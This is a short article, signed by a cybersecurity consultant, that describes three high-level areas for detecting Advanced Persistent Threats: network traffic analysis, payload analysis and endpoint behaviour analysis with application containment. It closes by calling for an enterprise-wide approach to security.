Today the threat landscape has changed. Hackers and scammers have grown smarter. Organizations these days face a much larger threat: Advanced Persistent Threat.

There is no rulebook for hackers to break into a system. However an organization must ensure they follow a security and monitoring framework which ensures all the boundaries and threat areas a covered. It is a challenge today not only to detect and remediate advanced persistent threat, but also to effectively address the issue in a timely manner.

There are three basic areas which need to be monitored and analysed to detect an Advanced Persistent Threat:
1. Network Traffic Analysis
2. Payload Analysis
3. Endpoint Behaviour Analysis

Network Traffic Analysis:
Network traffic is one of most important data the organization needs to analyse to detect any threat or a break in. By analysing the inbound and outbound traffic, any compromised system or network should be detected. This can include for example traffic patterns. Based on usage a baseline should be created of all the activities, and these can be compared to real time events to detect any anomaly.

To further strengthen this network forensics is an important activity that an organization should look into. Forensics would capture, store and analyse network traffic and provide data analytics to improve detection and remediation.

Payload Analysis
It is often very difficult to detect the actual extent of damage even when the compromise has been detected. Payload analysis helps in further analysing a malware or a compromised system to study its behaviour and detect the extent of damage it could have caused. It also helps in reducing false positive and also increases the effectiveness of detection. This is very effective in detecting malwares which bypass signature based verification.

However payload analysis is a time taking process. Moreoever sandboxing and replicating the exact environment is also a common challenge which all organisations face.

Endpoint Behaviour Analysis:
Endpoint Behaviour Analysis aims to detect any unwanted or suspicious activity within the endpoints. It can be a network related activity originating from the end point or an application behaviour anomaly.

One of the interesting technology is Application Containment. In this a suspicious application or a compromised application is allowed to function in a container (thus isolating it from accessing from any other data in the system). Its behavior is monitored and it is fed with some similar data to simulate its activity. However this is a resource consuming process and often not very user friendly.

As the threat scenario is changing, information security is no longer the work of individuals. An enterprise wide approach needs to be undertaken, taking into all key stakeholders, management, business and IT to achieve a collective goal to securing an organization.

Rahul Das
Consultant | Cyber Security
PwC, India
(IIITA, MS-CLIS 2011-2013)